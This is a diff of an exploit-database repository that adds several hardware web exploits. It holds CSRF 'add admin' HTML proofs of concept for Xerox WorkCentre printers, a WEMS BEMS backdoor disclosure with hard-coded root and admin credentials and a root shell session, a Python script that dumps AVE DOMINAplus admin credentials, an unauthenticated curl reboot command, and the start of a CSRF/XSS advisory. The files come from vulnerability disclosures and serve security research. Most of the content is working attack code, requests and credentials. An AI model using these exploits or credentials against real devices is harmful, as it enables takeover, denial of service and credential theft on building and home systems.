||||
<form action="https://server/dummypost/xerox.set" method="POST">
|
||||
<input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" />
|
||||
<input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
|
||||
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
|
||||
<input type="hidden" name="CcgenModule" value="UserEdit" />
|
||||
<input type="hidden" name="isRoles" value="True" />
|
||||
<input type="hidden" name="isPassword" value="True" />
|
||||
<input type="hidden" name="isCreate" value="True" />
|
||||
<input type="hidden" name="rolesStr" value="2,5,1," />
|
||||
<input type="hidden" name="limited" value="False" />
|
||||
<input type="hidden" name="oid" value="0" />
|
||||
<input type="hidden" name="userName" value="ismailtasdelen" />
|
||||
<input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
|
||||
<input type="hidden" name="newPassword" value="Test1234" />
|
||||
<input type="hidden" name="retypePassword" value="Test1234" />
|
||||
<input type="hidden" name="role" value="2" />
|
||||
<input type="hidden" name="role" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
72
exploits/hardware/webapps/47815.txt
Normal file
72
exploits/hardware/webapps/47815.txt
Normal file
|
@ -0,0 +1,72 @@
|
|||
# Exploit Title: XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)
|
||||
# Date: 2018-12-19
|
||||
# Exploit Author: Ismail Tasdelen
|
||||
# Vendor Homepage: https://www.xerox.com/
|
||||
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series/
|
||||
# Software : Xerox Printer
|
||||
# Product Version: WorkCentre® 7855
|
||||
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
|
||||
# Vulenrability : Cross-Site Request Forgery
|
||||
# CVE : N/A
|
||||
|
||||
# Description :
|
||||
# The CSRF vulnerability was discovered in the WorkCentre® 7855 printer model of Xerox printer hardware.
|
||||
# A request to add users is made in the Device User Database form field. This request is captured by
|
||||
# the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7855 printers allow CSRF. A request
|
||||
# to add users is made in the Device User Database form field to the xerox.set URI.
|
||||
# (The frmUserName value must have a unique name.)
|
||||
|
||||
HTTP POST Request :
|
||||
|
||||
POST /dummypost/xerox.set HTTP/1.1
|
||||
Host: server
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 494
|
||||
Origin: http://server
|
||||
Connection: close
|
||||
Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
|
||||
Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=04dc6361e94c451ff4d7d1d3ef8e32cd; WebTimerPopupID=12; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000001000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
CSRFToken=67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
|
||||
|
||||
HTTP Response :
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Thu, 19 Dec 2019 05:13:19 GMT
|
||||
Server: Apache
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
Content-Length: 11947
|
||||
|
||||
CSRF HTML PoC :
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://server/dummypost/xerox.set" method="POST">
|
||||
<input type="hidden" name="CSRFToken" value="67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b" />
|
||||
<input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
|
||||
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
|
||||
<input type="hidden" name="CcgenModule" value="UserEdit" />
|
||||
<input type="hidden" name="isRoles" value="True" />
|
||||
<input type="hidden" name="isPassword" value="True" />
|
||||
<input type="hidden" name="isCreate" value="True" />
|
||||
<input type="hidden" name="rolesStr" value="2,5,1," />
|
||||
<input type="hidden" name="limited" value="False" />
|
||||
<input type="hidden" name="oid" value="0" />
|
||||
<input type="hidden" name="userName" value="ismailtasdelen" />
|
||||
<input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
|
||||
<input type="hidden" name="newPassword" value="Test1234" />
|
||||
<input type="hidden" name="retypePassword" value="Test1234" />
|
||||
<input type="hidden" name="role" value="2" />
|
||||
<input type="hidden" name="role" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
72
exploits/hardware/webapps/47816.txt
Normal file
72
exploits/hardware/webapps/47816.txt
Normal file
|
@ -0,0 +1,72 @@
|
|||
# Exploit Title: XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)
|
||||
# Date: 2018-12-19
|
||||
# Exploit Author: Ismail Tasdelen
|
||||
# Vendor Homepage: https://www.xerox.com/
|
||||
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series
|
||||
# Software : Xerox Printer
|
||||
# Product Version: WorkCentre® 7830
|
||||
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
|
||||
# Vulenrability : Cross-Site Request Forgery
|
||||
# CVE : N/A
|
||||
|
||||
# Description :
|
||||
# The CSRF vulnerability was discovered in the WorkCentre® 7830 printer model of Xerox printer hardware.
|
||||
# A request to add users is made in the Device User Database form field. This request is captured by
|
||||
# the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7830 printers allow CSRF. A request
|
||||
# to add users is made in the Device User Database form field to the xerox.set URI.
|
||||
# (The frmUserName value must have a unique name.)
|
||||
|
||||
HTTP POST Request :
|
||||
|
||||
POST /dummypost/xerox.set HTTP/1.1
|
||||
Host: server
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 494
|
||||
Origin: http://server
|
||||
Connection: close
|
||||
Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
|
||||
Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=6524448254c9d6d6de52fe4a1085b994; WebTimerPopupID=5; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
CSRFToken=078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
|
||||
|
||||
HTTP Response :
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Thu, 19 Dec 2019 05:34:36 GMT
|
||||
Server: Apache
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
Content-Length: 15022
|
||||
|
||||
CSRF HTML PoC :
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://server/dummypost/xerox.set" method="POST">
|
||||
<input type="hidden" name="CSRFToken" value="078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708" />
|
||||
<input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
|
||||
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
|
||||
<input type="hidden" name="CcgenModule" value="UserEdit" />
|
||||
<input type="hidden" name="isRoles" value="True" />
|
||||
<input type="hidden" name="isPassword" value="True" />
|
||||
<input type="hidden" name="isCreate" value="True" />
|
||||
<input type="hidden" name="rolesStr" value="2,5,1," />
|
||||
<input type="hidden" name="limited" value="False" />
|
||||
<input type="hidden" name="oid" value="0" />
|
||||
<input type="hidden" name="userName" value="ismailtasdelen" />
|
||||
<input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
|
||||
<input type="hidden" name="newPassword" value="Test1234" />
|
||||
<input type="hidden" name="retypePassword" value="Test1234" />
|
||||
<input type="hidden" name="role" value="2" />
|
||||
<input type="hidden" name="role" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
211
exploits/hardware/webapps/47817.txt
Normal file
211
exploits/hardware/webapps/47817.txt
Normal file
|
@ -0,0 +1,211 @@
|
|||
# Exploit: WEMS BEMS 21.3.1 - Undocumented Backdoor Account
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: WEMS Limited
|
||||
# Product web page: https://www.wems.co.uk
|
||||
# Advisory ID: ZSL-2019-5552
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php
|
||||
|
||||
WEMS BEMS 21.3.1 Undocumented Backdoor Account
|
||||
|
||||
|
||||
Vendor: WEMS Limited
|
||||
Product web page: https://www.wems.co.uk
|
||||
Affected version: Web: 21.3.1
|
||||
Web: 20.0beta
|
||||
Web: 19.5
|
||||
Web: 18.4
|
||||
Firmware: 1.26.6 (OS: 5.3)
|
||||
Firmware: 1.23.7 (OS: 5.0)
|
||||
Firmware: 1.21.4 (OS: 4.1a-usb)
|
||||
Firmware: 1.18.0.3 (OS: i686-1.1)
|
||||
Platform: Shockwave Flash (SWF) / CGI
|
||||
|
||||
Summary: We (WEMS) offer the world's first fully wireless energy management system.
|
||||
Our solution enables your organization to take control of its energy costs, by monitoring
|
||||
lighting, heating and air conditioning equipment to identify wastage across multiple
|
||||
sites and start saving money instantly. Additionally, we offer a service which enables
|
||||
you to personally control the settings of your building - remotely, via text messaging
|
||||
and the internet - from wherever you happen to be in the world.
|
||||
|
||||
Desc: The wireless BMS solution has an undocumented backdoor account that is Base64-encoded.
|
||||
These sets of credentials are never exposed to the end-user and cannot be changed through
|
||||
any normal operation of the controller thru the RMI. Attacker could exploit this vulnerability
|
||||
by logging in using the backdoor account with highest privileges for administration and gain
|
||||
full system control. The check_users.sh Bash script is used to generate the default accounts
|
||||
on the system with their passwords and privilege level. The backdoor user cannot be seen in
|
||||
the users settings in the admin panel and it also uses an undocumented privilege level 3 when
|
||||
using the addhttpuser program which allows full availability of the features that the WEMS
|
||||
is offering remotely. WEMS also ships with hard-coded and weak credentials for Telnet/FTP
|
||||
access using the credentials gast:glasshou or root:glasshou.
|
||||
|
||||
Tested on: Linux 2.6.16 armv5tejl
|
||||
thttpd/2.25b
|
||||
Adam 7000 System
|
||||
WEMS OS 5.3
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5552
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php
|
||||
|
||||
|
||||
06.07.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
Excerpt content of check_users.sh bash script:
|
||||
----------------------------------------------
|
||||
|
||||
# cat /tmp/check_users.sh
|
||||
...
|
||||
...
|
||||
if [ -n "${varSystem}" ];then
|
||||
#add 'V.A.R.' user credentials
|
||||
/mnt/bin/addhttpuser -u var -p 88fRK66Q -l 2 > /dev/null
|
||||
/mnt/bin/addhttpuser -u varuser -p user -l 1 > /dev/null
|
||||
/mnt/bin/addhttpuser -u varview -p view -l 0 > /dev/null
|
||||
else
|
||||
#add 'wems' user credentials
|
||||
/mnt/bin/addhttpuser -u wems -p kup5EF4s -l 2 > /dev/null
|
||||
/mnt/bin/addhttpuser -u wemsuser -p user -l 1 > /dev/null
|
||||
/mnt/bin/addhttpuser -u wemsview -p view -l 0 > /dev/null
|
||||
fi
|
||||
|
||||
echo "Adding logging user credentials..."
|
||||
/mnt/bin/addhttpuser -u YWRhbWNvbGxlY3Q -p YzAxMTNjdGFkYW0K -l 3 > /dev/null
|
||||
|
||||
# Verify user added successfully...
|
||||
if [ "$?" -eq "255" ]
|
||||
then
|
||||
echo "Error when adding logging user credentials - aborting.."
|
||||
cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
|
||||
exit
|
||||
fi
|
||||
|
||||
veri_user=`grep -e 'YWRhbWNvbGxlY3Q' /mnt/etc/httpusers`
|
||||
|
||||
if [ -n "$veri_user" ]
|
||||
then
|
||||
echo "User credentials added successfully."
|
||||
cp -p /mnt/etc/httpusers /mnt/etc/httpusers.default
|
||||
exit
|
||||
else
|
||||
echo "Error when adding user credentials - restoring defaults."
|
||||
cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
|
||||
fi
|
||||
----------------------------------------------
|
||||
|
||||
|
||||
Default and hard-coded credentials:
|
||||
-----------------------------------
|
||||
|
||||
WEMS:
|
||||
|
||||
[Level 2/Admin - Web/SWF->CGI] : wems:kup5EF4s
|
||||
[Level 1/User - Web/SWF->CGI] : wemsuser:user
|
||||
[Level 0/View - Web/SWF->CGI] : wemsview:view
|
||||
[Level 3/Backdoor - Web/SWF->CGI] : YWRhbWNvbGxlY3Q:YzAxMTNjdGFkYW0K (adamcollect:c0113ctadam)
|
||||
|
||||
V.A.R. (Value Added Reseller):
|
||||
|
||||
[Level 2/Admin - Web/SWF->CGI] : var:88fRK66Q
|
||||
[Level 1/User - Web/SWF->CGI] : varuser:user
|
||||
[Level 0/View - Web/SWF->CGI] : varview:view
|
||||
|
||||
Shell:
|
||||
|
||||
[Level 500/User - Telnet/FTP] : gast:glasshou
|
||||
[Level 0/root - Telnet/FTP] : root:glasshou
|
||||
-----------------------------------
|
||||
|
||||
|
||||
By calling the auth command through the cmd parameter, the cgiauth binary
|
||||
reads the /mnt/etc/httpusers file and checks validation for authentication.
|
||||
To login with the backdoor account the following HTTP GET request is made:
|
||||
--------------------------------------------------------------------------
|
||||
|
||||
GET /cgi-bin/cgiauth?user=YWRhbWNvbGxlY3Q&pass=YzAxMTNjdGFkYW0K&cmd=auth HTTP/1.1
|
||||
Host: 192.168.1.17
|
||||
User-Agent: Noproblem/25.1
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Referer: http://192.168.1.17/SMARThome1.swf
|
||||
|
||||
Response observed:
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
content-type: text/html
|
||||
Transfer-Encoding: chunked
|
||||
Date: Fri, 13 Sep 2019 18:15:17 GMT
|
||||
Server: WEMS OS 5.0 Casino
|
||||
|
||||
sessionid=EQhaZPEXgJQhkXeZ&level=3&username=YWRhbWNvbGxlY3Q
|
||||
|
||||
|
||||
--------------------------------------------------------------------------
|
||||
|
||||
|
||||
Running addhttpuser, reading httpusers file:
|
||||
--------------------------------------------
|
||||
|
||||
# /mnt/bin/addhttpuser
|
||||
Usage is -u <username> -p <password> -l <level>
|
||||
# cat /mnt/etc/httpusers
|
||||
0:wems:$1$3EVBJ96F$RBX7xggVT8.zXM9vDbGWB/:2
|
||||
1:wemsuser:$1$3EVBJA6F$Gr6zU7L0n4OPq7YdCM5.b1:1
|
||||
2:wemsview:$1$3EVBJB6F$6XtYBc2VaQYucRe2T7lfa.:0
|
||||
3:YWRhbWNvbGxlY3Q:$1$3EVBJD6F$scO5furQud3eKLHpNyUyo.:3
|
||||
# ls -al /mnt/bin/addhttpuser
|
||||
-rwxr-xr-x 1 root root 16520 Jan 29 2014 /mnt/bin/addhttpuser
|
||||
--------------------------------------------
|
||||
|
||||
|
||||
Root shell:
|
||||
-----------
|
||||
|
||||
$ telnet 192.168.1.17
|
||||
Connected to 192.168.1.17.
|
||||
Escape character is '^]'.
|
||||
|
||||
- Adam 7000 System - Version 4.1a-usb -
|
||||
|
||||
WEMS login: gast
|
||||
Password:
|
||||
|
||||
|
||||
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
|
||||
Enter 'help' for a list of built-in commands.
|
||||
|
||||
$ id
|
||||
uid=500(gast) gid=500
|
||||
$ su
|
||||
Password:
|
||||
|
||||
|
||||
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
|
||||
Enter 'help' for a list of built-in commands.
|
||||
|
||||
# id
|
||||
uid=0(root) gid=0(root)
|
||||
# netstat -nat
|
||||
Active Internet connections (servers and established)
|
||||
Proto Recv-Q Send-Q Local Address Foreign Address State
|
||||
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
|
||||
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
|
||||
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
|
||||
-----------
|
||||
|
||||
|
||||
$ ftp 192.168.1.17
|
||||
WEMS FTP server (Version wu-2.6.2(12) Thu Feb 24 14:48:47 GMT 2011) ready.
|
||||
user root
|
||||
331 Password required for root.
|
||||
pass glasshou
|
||||
230 User root logged in.
|
115
exploits/hardware/webapps/47819.txt
Normal file
115
exploits/hardware/webapps/47819.txt
Normal file
|
@ -0,0 +1,115 @@
|
|||
# Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: AVE S.p.A.
|
||||
# Product web page: https://www.ave.it | https://www.domoticaplus.it
|
||||
# Affected version: Web Server Code 53AB-WBS - 1.10.62
|
||||
# Advisory ID: ZSL-2019-5550
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php
|
||||
|
||||
#!/usr/bin/env python
|
||||
#
|
||||
#
|
||||
# AVE DOMINAplus <=1.10.x Credentials Disclosure Exploit
|
||||
#
|
||||
#
|
||||
# Vendor: AVE S.p.A.
|
||||
# Product web page: https://www.ave.it | https://www.domoticaplus.it
|
||||
# Affected version: Web Server Code 53AB-WBS - 1.10.62
|
||||
# Touch Screen Code TS01 - 1.0.65
|
||||
# Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
|
||||
# Touch Screen Code TS05 - 1.10.36
|
||||
# Models: 53AB-WBS
|
||||
# TS01
|
||||
# TS03V
|
||||
# TS04X-V
|
||||
# TS05N-V
|
||||
# App version: 1.10.77
|
||||
# App version: 1.10.65
|
||||
# App version: 1.10.64
|
||||
# App version: 1.10.62
|
||||
# App version: 1.10.60
|
||||
# App version: 1.10.52
|
||||
# App version: 1.10.52A
|
||||
# App version: 1.10.49
|
||||
# App version: 1.10.46
|
||||
# App version: 1.10.45
|
||||
# App version: 1.10.44
|
||||
# App version: 1.10.35
|
||||
# App version: 1.10.25
|
||||
# App version: 1.10.22
|
||||
# App version: 1.10.11
|
||||
# App version: 1.8.4
|
||||
# App version: TS1-1.0.65
|
||||
# App version: TS1-1.0.62
|
||||
# App version: TS1-1.0.44
|
||||
# App version: TS1-1.0.10
|
||||
# App version: TS1-1.0.9
|
||||
#
|
||||
# Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
|
||||
# Designed to revolutionize your concept of living. DOMINA plus is the AVE home
|
||||
# automation proposal that makes houses safer, more welcoming and optimized. In
|
||||
# fact, our home automation system introduces cutting-edge technologies, designed
|
||||
# to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
|
||||
# and security and offers advanced supervision tools in order to learn how to evaluate
|
||||
# and reduce consumption through various solutions dedicated to energy saving.
|
||||
#
|
||||
# Desc: The application suffers from clear-text credentials disclosure vulnerability
|
||||
# that allows an unauthenticated attacker to issue a request to an unprotected directory
|
||||
# that hosts an XML file '/xml/authClients.xml' and obtain administrative login information
|
||||
# that allows for a successful authentication bypass attack.
|
||||
#
|
||||
# Default credentials: admin:password
|
||||
# Configuration and camera credentials disclosure: /xml/tsconf.xml
|
||||
#
|
||||
# ==================================================
|
||||
# root@kali:~/domina# ./poc.py http://192.168.1.10
|
||||
#
|
||||
# Ze microfilm:
|
||||
# -------------
|
||||
# Username: arnoldcontrol
|
||||
# Password: P1sD0nt5pYMe
|
||||
# ==================================================
|
||||
#
|
||||
# Tested on: GNU/Linux 4.1.19-armv7-x7
|
||||
# GNU/Linux 3.8.13-bone50/bone71.1/bone86
|
||||
# Apache/2.4.7 (Ubuntu)
|
||||
# Apache/2.2.22 (Debian)
|
||||
# PHP/5.5.9-1ubuntu4.23
|
||||
# PHP/5.4.41-0+deb7u1
|
||||
# PHP/5.4.36-0+deb7u3
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2019-5550
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php
|
||||
#
|
||||
#
|
||||
# 06.10.2019
|
||||
#
|
||||
|
||||
import sys,re
|
||||
import xml.etree.ElementTree as XML
|
||||
|
||||
from urllib2 import Request,urlopen
|
||||
|
||||
if (len(sys.argv) <= 1):
|
||||
print '[*] Usage: poc.py http://ip:port'
|
||||
exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
headers = {'Accept': 'application/xml'}
|
||||
request = Request(host+'/xml/authClients.xml', headers=headers)
|
||||
print '\nZe microfilm:'
|
||||
print '-------------'
|
||||
xml = urlopen(request).read()
|
||||
tree = XML.fromstring(xml)
|
||||
|
||||
for user in tree.findall('customer'):
|
||||
print 'Username: ',user.get('plantCode')
|
||||
|
||||
for pwd in tree.iter('password'):
|
||||
print 'Password: '+pwd.text+'\n'
|
79
exploits/hardware/webapps/47820.txt
Normal file
79
exploits/hardware/webapps/47820.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
# Exploit: AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: AVE S.p.A.
|
||||
# Product web page: https://www.ave.it | https://www.domoticaplus.it
|
||||
# Affected version: Web Server Code 53AB-WBS - 1.10.62
|
||||
# Advisory ID: ZSL-2019-5548
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php
|
||||
|
||||
AVE DOMINAplus <=1.10.x Unauthenticated Remote Reboot
|
||||
|
||||
|
||||
Vendor: AVE S.p.A.
|
||||
Product web page: https://www.ave.it | https://www.domoticaplus.it
|
||||
Affected version: Web Server Code 53AB-WBS - 1.10.62
|
||||
Touch Screen Code TS01 - 1.0.65
|
||||
Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
|
||||
Touch Screen Code TS05 - 1.10.36
|
||||
Models: 53AB-WBS
|
||||
TS01
|
||||
TS03V
|
||||
TS04X-V
|
||||
TS05N-V
|
||||
App version: 1.10.77
|
||||
App version: 1.10.65
|
||||
App version: 1.10.64
|
||||
App version: 1.10.62
|
||||
App version: 1.10.60
|
||||
App version: 1.10.52
|
||||
App version: 1.10.52A
|
||||
App version: 1.10.49
|
||||
App version: 1.10.46
|
||||
App version: 1.10.45
|
||||
App version: 1.10.44
|
||||
App version: 1.10.35
|
||||
App version: 1.10.25
|
||||
App version: 1.10.22
|
||||
App version: 1.10.11
|
||||
App version: 1.8.4
|
||||
App version: TS1-1.0.65
|
||||
App version: TS1-1.0.62
|
||||
App version: TS1-1.0.44
|
||||
App version: TS1-1.0.10
|
||||
App version: TS1-1.0.9
|
||||
|
||||
Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
|
||||
Designed to revolutionize your concept of living. DOMINA plus is the AVE home
|
||||
automation proposal that makes houses safer, more welcoming and optimized. In
|
||||
fact, our home automation system introduces cutting-edge technologies, designed
|
||||
to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
|
||||
and security and offers advanced supervision tools in order to learn how to
|
||||
evaluate and reduce consumption through various solutions dedicated to energy
|
||||
saving.
|
||||
|
||||
Desc: The application suffers from an unauthenticated reboot command execution.
|
||||
Attackers can exploit this issue to cause a denial of service scenario.
|
||||
|
||||
Tested on: GNU/Linux 4.1.19-armv7-x7
|
||||
GNU/Linux 3.8.13-bone50/bone71.1/bone86
|
||||
Apache/2.4.7 (Ubuntu)
|
||||
Apache/2.2.22 (Debian)
|
||||
PHP/5.5.9-1ubuntu4.23
|
||||
PHP/5.4.41-0+deb7u1
|
||||
PHP/5.4.36-0+deb7u3
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5548
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php
|
||||
|
||||
|
||||
06.10.2019
|
||||
|
||||
--
|
||||
|
||||
curl -sk https://192.168.1.10/restart.php >/dev/null
|
108
exploits/hardware/webapps/47821.txt
Normal file
108
exploits/hardware/webapps/47821.txt
Normal file
|
@ -0,0 +1,108 @@
|
|||
# Exploit: AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: AVE S.p.A.
|
||||
# Product web page: https://www.ave.it | https://www.domoticaplus.it
|
||||
# Affected version: Web Server Code 53AB-WBS - 1.10.62
|
||||
# Advisory ID: ZSL-2019-5547
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php
|
||||
|
||||
AVE DOMINAplus <=1.10.x CSRF/XSS Vulnerabilities
|
||||
|
||||
|
||||
Vendor: AVE S.p.A.
|
||||
Product web page: https://www.ave.it | https://www.domoticaplus.it
|
||||
Affected version: Web Server Code 53AB-WBS - 1.10.62
|
||||
Touch Screen Code TS01 - 1.0.65
|
||||
Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
|
||||
Touch Screen Code TS05 - 1.10.36
|
||||
Models: 53AB-WBS
|
||||
TS01
|
||||
TS03V
|
||||
TS04X-V
|
||||
TS05N-V
|
||||
App version: 1.10.77
|
||||
App version: 1.10.65
|
||||
App version: 1.10.64
|
||||
App version: 1.10.62
|
||||
App version: 1.10.60
|
||||
App version: 1.10.52
|
||||
App version: 1.10.52A
|
||||
App version: 1.10.49
|
||||
App version: 1.10.46
|
||||
App version: 1.10.45
|
||||
App version: 1.10.44
|
||||
App version: 1.10.35
|
||||
App version: 1.10.25
|
||||
App version: 1.10.22
|
||||
App version: 1.10.11
|
||||
App version: 1.8.4
|
||||
App version: TS1-1.0.65
|
||||
App version: TS1-1.0.62
|
||||
App version: TS1-1.0.44
|
||||
App version: TS1-1.0.10
|
||||
App version: TS1-1.0.9
|
||||
|
||||
Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
|
||||
Designed to revolutionize your concept of living. DOMINA plus is the AVE home
|
||||
automation proposal that makes houses safer, more welcoming and optimized. In
|
||||
fact, our home automation system introduces cutting-edge technologies, designed
|
||||
to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
|
||||
and security and offers advanced supervision tools in order to learn how to
|
||||
evaluate and reduce consumption through various solutions dedicated to energy
|
||||
saving.
|
||||
|
||||
Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The
|
||||
application allows users to perform certain actions via HTTP requests without
|
||||
performing any validity checks to verify the requests. This can be exploited
|
||||
to perform certain actions with administrative privileges if a logged-in user
|
||||
visits a malicious web site. Input passed to several GET/POST parameters is not
|
||||
properly sanitised before being returned to the user. This can be exploited to
|
||||
execute arbitrary HTML and script code in a user's browser session in context
|
||||
of an affected site.
|
||||
|
||||
Tested on: GNU/Linux 4.1.19-armv7-x7
|
||||
GNU/Linux 3.8.13-bone50/bone71.1/bone86
|
||||
Apache/2.4.7 (Ubuntu)
|
||||
Apache/2.2.22 (Debian)
|
||||
PHP/5.5.9-1ubuntu4.23
|
